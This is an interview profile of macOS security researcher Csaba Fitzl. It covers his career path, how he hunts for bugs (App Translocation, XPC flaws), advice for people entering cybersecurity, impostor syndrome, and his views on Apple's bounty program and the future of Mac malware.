When Csaba Fitzl graduated from university with a degree in computer engineering, he wasn’t planning to go into cybersecurity at all. His first professional role was as a network support technician for Cisco, followed by several years as a network engineer at ExxonMobil.
But when an old friend from university told Fitzl what he’d been up to, his interest was piqued:
CF: I had a friend who was in security, and we used to meet regularly to keep in touch. And one day, he said, “Hey, I just became a ‘certified ethical hacker’; I got certified by the EC-Council”. And I thought, “Hmm … that sounds cool!” So I went to do the CEH training that we had in Hungary at the time. It was just an introductory thing, like five days, but it was really eye-opening.
Fitzl continued his studies in cybersecurity on the side, in addition to his regular IT work, until one day he was offered an opportunity to take on a security role at his company:
CF: I joined a blue team that had been formed in Budapest, and stayed in that role for about six years: hunting for adversaries, doing incident response, and so on. But actually, except in maybe one or two cases, all of the training I did was on the offensive side. That was what interested me much more than blue team work. And after some time, I actually got to switch to a red team at Exxon.
Like many people in the world of information security, Fitzl’s career path wasn’t always straightforward, and often involved a great deal of self-study. This was doubly true of his move to macOS security, an area of interest that he started pursuing in his spare time, without any formal training:
I somehow drifted to macOS and learned everything from blog posts, conference talks, and books.
CF: I was always a Windows guy. Most of the training in enterprise cybersecurity, pretty much wherever you go, focuses on Windows environments.
But we had this Mac for lab use, and I don’t know why exactly, but I got interested in trying some macOS stuff. I started with Patrick Wardle’s DEF CON talk about DLL Hijacking on OS X, and I began hunting for dylib hijacking vulnerabilities on macOS. And aside from finding a few, I also went down the rabbit hole and found a vulnerability in macOS itself where I could gain root access by installing an application from the App Store.
So basically, I somehow drifted to macOS and learned everything from blog posts, conference talks, and books like Jonathan Levin’s OS Internals. Back then there was no formal training — not really — for macOS security.
Over the past several years, Fitzl has established himself within the security research community. He has found a number of other macOS vulnerabilities, and has spoken at several important cybersecurity conferences, including Black Hat USA and Objective by the Sea.
But to people outside of the community, the activity of bug hunting can often seem somewhat mysterious. When an everyday user hears that a security researcher has “discovered a bug” in their OS, they may find themselves wondering how that researcher ever knew where to look for it in the first place!
As Fitzl describes it, however, his research methodology follows a fairly logical process:
I try to think: OK, so this is how it works. What happens if I change something?
CF: I start by trying to understand how things work on macOS — or at least, how they’re supposed to work.
Once I’ve done that, I try to think, OK, so this is how it works. What happens if I change something in the workflow? Or what if there’s a legitimate feature of macOS that I can abuse? And sometimes it just so happens that there is!
One example would be the App Translocation bug that I covered in my Black Hat talk, and which I will also cover at Objective by the Sea. There is a macOS feature called App Translocation. Here’s how it works. Let’s say you download an application from the Internet, but instead of moving it to the Applications directory, you start it right away from the Downloads folder. macOS won’t move the app — it will mount it over another location and run it from there. This was actually introduced to mitigate a bug found by Patrick Wardle, and it’s a legitimate macOS feature.
Now, as many users probably know, macOS has privacy protections that lock down locations where sensitive user data is stored: Documents, Messages, Contacts, and so on. And I thought: OK, could I use the App Translocation feature to translocate, to “move”, the Documents folder, or the Contacts folder, to a different location — a location that isn’t under privacy protection? And it turned out that you could do that. So again, if you understand how things work on macOS, then you can begin to see how to use those things in a way they weren’t intended to be used!
In addition, says Fitzl, some types of bugs tend to occur in predictable ways. Once a researcher knows what they’re looking for — or just where to look — they can speed up the process of finding new bugs:
CF: There are patterns for finding bugs. For example, XPC bugs. There are less of them these days, but security researchers found lots and lots of privilege escalation bugs just by abusing XPC services — especially on third-party software. And there was a regular pattern to how you would find those vulnerabilities.
Basically, a vulnerable app would lack some sort of validation, or would have a validation issue. And you could just open up any third-party app, look at the XPC service, and quickly determine if it was vulnerable or not. So that’s another way to do bug hunting: If you have a pattern for a bug, you can basically look for the same type of bug horizontally, on other services, applications, and even on macOS itself.
When he’s not hunting for new macOS vulnerabilities, Fitzl works as a content creator at Offensive Security, a well-regarded cybersecurity training company. He has authored a Mac security training called “macOS Control Bypasses” which covers security, vulnerability research, and penetration testing on macOS. The course is an attempt to provide others with the kind of formal training and guidance that was lacking when he first started learning macOS security.
Through his work at Offensive Security, Fitzl has become deeply involved in helping students and career changers who are looking to get into cybersecurity — and he has some advice for those entering the field:
If you’re going to go into cybersecurity, you need to understand that you’re signing up for a process of heavy, lifelong learning.
CF: If you’re going to go into cybersecurity, you need to understand that you’re signing up for a process of heavy, lifelong learning. So you need to be OK with that — and you need to be curious!
I also hear many people say that they want to go straight to security without even having an IT background. But in my opinion, you need to have a strong foundation in IT before you go into security. You need to know how the infrastructure works — how everything works together at a high level. You need some basic programming skills. You don’t have to be a developer, but you need to understand code. Even if you’re doing red team stuff, you’re going to need to interact with lots of different systems, you need to be able to find bugs in various software components, or infrastructure components for services.
So learn at least the basics first, and then go into security. Because if you don’t know how all of the underlying stuff works, you may have some quick wins in the beginning, but it’s not going to work out well in the long run.
For people who already have a background in IT, or even in computer security, getting involved in vulnerability research may be a good option. However, as Fitzl points out, it’s a vast field, and it can be difficult to know what you want to do when you’re just starting out. Because of this, he recommends taking a broad approach in the beginning:
CF: If you’re ready to get into vulnerability research, I’d suggest starting with a general, introductory, offensive training. There are tons of these. Go for one that covers a lot of different topics. For example, I’m working at Offensive Security right now, and they offer a foundational course called “Penetration Testing with Kali Linux” (PWK). PWK covers some binary exploitation, some web stuff, some SQL stuff, Active Directory — a little bit of everything. Start with something like that, and just see what interests you. You may realize that you’re more interested in binary exploitation than application pentesting. On the other hand, some people don’t really care about binary exploitation, they want to do web pentesting. So do an introductory training, and then pick a field you’re interested in and start specializing in that.
With cybersecurity skills in such high demand, the field is attractive to both students and career changers. It’s certainly a good time to get involved in security, and in many countries, there is support for training and recruitment at the highest levels of government.
But many people who enter the world of infosec find it to be an intimidating place. In particular, people who work in cybersecurity — even those who have been doing it for some time — often report that they suffer from “impostor syndrome”. Impostor syndrome is a term used by psychologists to describe the experience of doubting one’s own skills and abilities, coupled with an overwhelming fear of being exposed as a fraud.
Fitzl is well aware of the phenomenon, and has some thoughts on how to deal with it:
CF: If you work in cybersecurity, you can always find someone who you feel is more clever than you, or more accomplished, or who is just generally more awesome than you are. And that feeling doesn’t go away. You can always feel that maybe you’re “dumb” or you’re “not good enough”.
To fight impostor syndrome, you need to take the time to appreciate yourself.
I think part of the issue is that as you learn more, you start to see more of what you don’t know. It’s as if the “what you don’t know” is increasing. It isn’t, of course: Your knowledge is actually growing. But because you’re realizing, “Hey, I don’t know this”, and “Oh, I don’t know that”, you can sometimes feel as if you know less than you did when you started!
For me, what helps is to try to look back regularly and take stock of what I’ve achieved: this certification, that bug I found, or even just work accomplishments. To fight impostor syndrome, I think you actually need to take the time to appreciate yourself!
In addition, Fitzl cautions against attempting to achieve “complete” cybersecurity knowledge (which he says is an unattainable ideal anyway) at the expense of everything else in life:
CF: Alex Ionescu had a really interesting talk at Offensive Con a couple of years ago about his career. Ionescu is a true security expert. He did ReactOS, he’s done lots of reverse engineering on Windows. If you want to learn Windows internals, his name is probably the first one that comes up. And one of the things he said in his talk was that, yes, he became this real expert on Windows — but it came at a cost. It affected his life. And this is something else that people need to consider.
You need to realize that you can devote all of your time to learning this stuff and you will still never “finish”. It’s impossible. For example, I’m focused on macOS now; I’m not really doing Windows anymore. And that means that my knowledge of Windows will start to fade away. I’m just not keeping up to date in that field. But I’ve accepted that, because, well, I’m doing macOS now. That’s my focus. Windows isn’t. At some point, you need to just let it go.
And you know what? Maybe you don’t want to only do computer security. Maybe you want to have time off to do other things. I enjoy hiking. I like being away from the computer. Now, that does mean that you’ll learn less about security. But if you’re like most people, you need to have some kind of work–life balance. There are people who genuinely enjoy doing security all of the time — and if you’re one of those people, there’s nothing wrong with that, don’t get me wrong. But you have to decide what you want for your life.
After nearly a decade in cybersecurity, Fitzl has seen quite a few changes in the field. And through his work on macOS security, he’s had the opportunity to observe firsthand how Apple’s relationship with the third-party security research community has evolved over time.
In general, Fitzl says, “Apple has improved,” but he believes that the company could still do much more to strengthen their relationship with security researchers:
CF: I think they could be more open about how they do things. For example, they could document much more. They used to have pretty good developer documentation in the past, which security researchers could learn a lot from. But many of the existing documents date back 8-10 years now, and they aren’t being refreshed anymore. It would be nice to see them updated.
Apple should engage more with researchers — and be more open.
It’s also nice that they open-source some of the kernel and a few other libraries, but that’s shrinking. It would be great if they maintained the same set of tools that they make open source. For example, launchd, the main process on macOS, used to be open source until a couple of years ago, but now it’s proprietary again.
And frankly, they should stop suing companies like Corellium. I understand that maybe Apple’s lawyers can find some legal justification for it, but they should really stop doing this. It’s just a really bad look. In general, they should engage more with researchers and be more open.
In recent years, one of the biggest changes to the way that Apple works with security researchers has been the introduction of a bug bounty program for macOS. As the discoverer of a number of macOS vulnerabilities, Fitzl is intimately acquainted with the program — and says that here too, there are some opportunities for improvement:
CF: The Apple Security Bounty (ASB) program is OK, at least in that they do pay a lot of money. But they are really, really slow in evaluating if a researcher is eligible for a bounty or not. I still have bugs that were fixed in the very first release of Big Sur, and they still haven’t decided if that bug (that they fixed last November) is eligible for a bounty or not. And it’s not just me. I’ve talked with other people who are working with ASB, and everyone is in the same boat. This is another place where they could really improve.
In fairness, it’s not like they’re “running away”. Eventually, people will get paid. But it just takes an inordinate amount of time. And if you stand to earn $10,000 for a bug, or even $50,000, which is what they offer for certain vulnerabilities, well, if you had that money one year earlier, you could invest it, or do something with it. You’re basically losing money by not getting the bounty in a timely fashion.
Lastly, Apple sometimes takes a really long time to fix bugs — easily over a year or a year and a half in some cases. I have bugs that I reported in Catalina … which will be fixed in Monterey!
Despite some frustrations with the way that Apple engages with third-party researchers, Fitzl is still optimistic about macOS platform security: “In general, I think Apple security is improving. They’re adding some nice features, and they have a good general approach to security”.
However, Fitzl worries that some recent changes in macOS may end up hindering security professionals who want to keep Mac users safe:
The Mac is becoming more and more locked down, but that’s a double-edged sword.
CF: The Mac is becoming more and more locked down. For example, they started to deprecate kernel extensions. I understand the reasoning behind that, because third-party kernel extensions tend to have a ton of bugs. On Windows, for example, there are thousands of vulnerabilities for kernel drivers that can be used to gain kernel privileges.
But it’s a double-edged sword. I worry that the Mac will one day become like the iPhone. I worry that we’ll end up in an iOS-like situation on macOS, where it’s hard to even investigate if a Mac is compromised or not, or to catch things like kernel rootkits — for the simple reason that you can’t install a kernel extension to detect rootkits living in your kernel! I do understand the approach. But it brings in other risks.
While Fitzl thinks that macOS security is headed in the right general direction, he also says that that he expects to see an increase in macOS malware in the future:
CF: We’re going to see Mac malware increase, because macOS is becoming more and more popular. The only reason that we don’t see much Linux malware is because Linux has maybe 1% of the OS market share on the consumer market. For the malware authors, there’s just no financial benefit to writing malware for Linux. But if Linux were more popular, I’m absolutely certain that Linux would have more malware.
There’s no such thing as perfect security. It doesn’t matter what platform you’re using. Windows, macOS, Linux — they’ll all have vulnerabilities. You can be exploited on any platform. So yes, Mac security is improving. But we’re going to continue to see macOS malware. We’re going to continue to see vulnerabilities for macOS. It’s a never-ending cat-and-mouse game.
SecureMac would like to thank Csaba Fitzl for taking the time to talk with us. To learn more about Fitzl and his work, visit his technical blog or follow him on Twitter. To see what he does when he’s not doing cybersecurity, check out his hiking and photography blog.
Csaba Fitzl will discuss mount operation internals and related vulnerabilities at Objective by the Sea 4.0 in a talk entitled “Mount(ain) of Bugs”. For details on how to watch the conference live stream, please see the Objective by the Sea website.